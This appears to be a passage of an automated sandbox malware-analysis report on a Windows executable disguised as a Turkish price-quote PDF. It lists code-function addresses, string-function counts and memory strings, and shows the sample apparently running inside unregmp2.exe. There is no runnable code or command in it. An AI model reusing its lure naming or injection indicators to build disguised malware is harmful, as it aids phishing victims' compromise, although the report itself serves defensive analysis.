            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE29A07_2_01AE29A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BAA9A67_2_01BAA9A6
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF69627_2_01AF6962
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AC68B87_2_01AC68B8
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E8F07_2_01B0E8F0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE28407_2_01AE2840
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AEA8407_2_01AEA840
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B96BD77_2_01B96BD7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9AB407_2_01B9AB40
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADEA807_2_01ADEA80
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF8DBF7_2_01AF8DBF
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADADE07_2_01ADADE0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7CD1F7_2_01B7CD1F
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AEAD007_2_01AEAD00
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80CB57_2_01B80CB5
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD0CF27_2_01AD0CF2
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0C007_2_01AE0C00
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5EFA07_2_01B5EFA0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AECFE07_2_01AECFE0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD2FC87_2_01AD2FC8
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B00F307_2_01B00F30
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B82F307_2_01B82F30
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B22F287_2_01B22F28
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B54F407_2_01B54F40
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9CE937_2_01B9CE93
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF2E907_2_01AF2E90
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9EEDB7_2_01B9EEDB
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9EE267_2_01B9EE26
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0E597_2_01AE0E59
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AEB1B07_2_01AEB1B0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BAB16B7_2_01BAB16B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B1516C7_2_01B1516C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACF1727_2_01ACF172
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B970E97_2_01B970E9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9F0E07_2_01B9F0E0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE70C07_2_01AE70C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B8F0CC7_2_01B8F0CC
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B2739A7_2_01B2739A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9132D7_2_01B9132D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACD34C7_2_01ACD34C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE52A07_2_01AE52A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B812ED7_2_01B812ED
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFB2C07_2_01AFB2C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7D5B07_2_01B7D5B0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA95C37_2_01BA95C3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B975717_2_01B97571
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9F43F7_2_01B9F43F
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD14607_2_01AD1460
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9F7B07_2_01B9F7B0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B916CC7_2_01B916CC
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B256307_2_01B25630
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B759107_2_01B75910
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE99507_2_01AE9950
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFB9507_2_01AFB950
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE38E07_2_01AE38E0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4D8007_2_01B4D800
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFFB807_2_01AFFB80
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B55BF07_2_01B55BF0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B1DBF97_2_01B1DBF9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9FB767_2_01B9FB76
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B25AA07_2_01B25AA0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7DAAC7_2_01B7DAAC
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B81AA37_2_01B81AA3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B8DAC67_2_01B8DAC6
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B53A6C7_2_01B53A6C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9FA497_2_01B9FA49
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B97A467_2_01B97A46
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFFDC07_2_01AFFDC0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B97D737_2_01B97D73
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B91D5A7_2_01B91D5A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE3D407_2_01AE3D40
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9FCF27_2_01B9FCF2
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B59C327_2_01B59C32
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9FFB17_2_01B9FFB1
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE1F927_2_01AE1F92
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AA3FD27_2_01AA3FD2
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AA3FD57_2_01AA3FD5
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9FF097_2_01B9FF09
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE9EB07_2_01AE9EB0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DBE4F69_2_04DBE4F6
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DC24469_2_04DC2446
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DB44209_2_04DB4420
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DD05919_2_04DD0591
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D105359_2_04D10535
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D2C6E09_2_04D2C6E0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D0C7C09_2_04D0C7C0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D347509_2_04D34750
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D107709_2_04D10770
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DA20009_2_04DA2000
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DC81CC9_2_04DC81CC
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DD01AA9_2_04DD01AA
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D981589_2_04D98158
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DAA1189_2_04DAA118
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D001009_2_04D00100
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D902C09_2_04D902C0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DB02749_2_04DB0274
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D1E3F09_2_04D1E3F0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DD03E69_2_04DD03E6
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DCA3529_2_04DCA352
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D00CF29_2_04D00CF2
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DB0CB59_2_04DB0CB5
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D10C009_2_04D10C00
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D0ADE09_2_04D0ADE0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D28DBF9_2_04D28DBF
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DACD1F9_2_04DACD1F
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D1AD009_2_04D1AD00
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DCEEDB9_2_04DCEEDB
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D22E909_2_04D22E90
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DCCE939_2_04DCCE93
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D10E599_2_04D10E59
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DCEE269_2_04DCEE26
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D02FC89_2_04D02FC8
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D1CFE09_2_04D1CFE0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D8EFA09_2_04D8EFA0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D84F409_2_04D84F40
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D30F309_2_04D30F30
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DB2F309_2_04DB2F30
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D52F289_2_04D52F28
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D3E8F09_2_04D3E8F0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04CF68B89_2_04CF68B8
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D1A8409_2_04D1A840
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D128409_2_04D12840
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D129A09_2_04D129A0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DDA9A69_2_04DDA9A6
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D269629_2_04D26962
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D0EA809_2_04D0EA80
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DC6BD79_2_04DC6BD7
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DCAB409_2_04DCAB40
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D014609_2_04D01460
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DCF43F9_2_04DCF43F
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DAD5B09_2_04DAD5B0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DC75719_2_04DC7571
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DC16CC9_2_04DC16CC
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DCF7B09_2_04DCF7B0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D170C09_2_04D170C0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DBF0CC9_2_04DBF0CC
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DC70E99_2_04DC70E9
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DCF0E09_2_04DCF0E0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D1B1B09_2_04D1B1B0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DDB16B9_2_04DDB16B
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D4516C9_2_04D4516C
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04CFF1729_2_04CFF172
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D2B2C09_2_04D2B2C0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DB12ED9_2_04DB12ED
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D152A09_2_04D152A0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D5739A9_2_04D5739A
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04CFD34C9_2_04CFD34C
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DC132D9_2_04DC132D
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DCFCF29_2_04DCFCF2
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D89C329_2_04D89C32
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D2FDC09_2_04D2FDC0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DC1D5A9_2_04DC1D5A
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D13D409_2_04D13D40
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DC7D739_2_04DC7D73
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D19EB09_2_04D19EB0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D11F929_2_04D11F92
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DCFFB19_2_04DCFFB1
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DCFF099_2_04DCFF09
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D138E09_2_04D138E0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D7D8009_2_04D7D800
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D199509_2_04D19950
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D2B9509_2_04D2B950
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DA59109_2_04DA5910
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DBDAC69_2_04DBDAC6
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D55AA09_2_04D55AA0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DADAAC9_2_04DADAAC
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DB1AA39_2_04DB1AA3
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DCFA499_2_04DCFA49
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DC7A469_2_04DC7A46
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D83A6C9_2_04D83A6C
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D85BF09_2_04D85BF0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D4DBF99_2_04D4DBF9
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D2FB809_2_04D2FB80
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04DCFB769_2_04DCFB76
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BD19209_2_00BD1920
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BEA4309_2_00BEA430
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BCCB209_2_00BCCB20
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BCCB189_2_00BCCB18
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BCADC09_2_00BCADC0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BCCD409_2_00BCCD40
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BD34609_2_00BD3460
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BD345B9_2_00BD345B
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_0502A4E99_2_0502A4E9
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_0502C1BC9_2_0502C1BC
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_0502B2289_2_0502B228
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_0502BD089_2_0502BD08
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_0502BE249_2_0502BE24
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: String function: 04D8F290 appears 105 times
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: String function: 04D57E54 appears 101 times
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: String function: 04CFB970 appears 280 times
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: String function: 04D45130 appears 58 times
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: String function: 04D7EA12 appears 86 times
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: String function: 01B5F290 appears 105 times
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: String function: 01B15130 appears 58 times
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: String function: 01ACB970 appears 280 times
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: String function: 01B27E54 appears 110 times
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: String function: 01B4EA12 appears 86 times
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1326590158.000000000122E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1335226544.00000000057A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1328306101.000000000490E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1327008085.0000000002E30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1336186879.0000000007BF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: periodtrackConductortrackComposertrackPerformertrackNumbertrackTitleWMContentIDpublisherRatingproviderStylealbumArtistalbumTitleWMCollectionGroupIDWMCollectionIDgenrelabelreleaseDatecommunityRatingdataProviderWM/IsCompilationAverageLevelPeakValueWM/WMCPDistributorIDWM/WMCPDistributorWM/WMShadowFileSourceDRMTypeWM/WMShadowFileSourceFileTypeWM/MediaOriginalBroadcastDateTimeWM/MediaOriginalChannelWM/MediaStationNameWM/SubTitleDescriptionWM/SubscriptionContentIDWM/ContentDistributorWM/ProviderStyleWM/ProviderRatingWM/ProviderWM/ISRCWM/DRMWM/CodecWM/PlaylistDelayWM/RadioStationOwnerWM/RadioStationNameWM/ModifiedByWM/UniqueFileIdentifierWM/WMCollectionGroupIDWM/WMCollectionIDWM/WMContentIDWM/DVDIDWM/TextWM/MoodWM/InitialKeyWM/BeatsPerMinuteWM/ParentalRatingWM/LanguageWM/AudioSourceURLWM/AudioFileURLWM/UserWebURLWM/AuthorURLWM/EncodingTimeWM/EncodingSettingsWM/EncodedByWM/PublisherWM/OriginalFilenameWM/OriginalReleaseYearWM/OriginalAlbumTitleWM/OriginalArtistWM/OriginalLyricistWM/Lyrics_SynchronisedWM/PictureWM/CategoryWM/PeriodWM/MediaClassSecondaryIDWM/MediaClassPrimaryIDWM/VideoFrameRateWM/VideoWidthWM/VideoHeightWM/ProtectionTypeWM/PartOfSetWM/SubTitleWM/ContentGroupDescriptionWM/DirectorWM/ProducerWM/ConductorWM/WriterAspectRatioYAspectRatioXWM/AlbumArtistIsVBRWM/ToolVersionWM/ToolNameWM/TrackNumberWM/LyricsWM/ComposerWM/MCDIWM/GenreIDWM/YearWM/GenreWM/AlbumCoverURLWM/PromotionURLWM/AlbumTitleDRM_IndividualizedVersionDRM_KeyIDCopyrightDescriptionAuthorTitleFileSizeCurrentBitrateIs_ProtectedDuration vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunregmp2.exej% vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.00000000016A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunregmp2.exej% vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542899848.0000000001BCD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeBinary or memory string: OriginalFilenameZhsW.exe0 vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
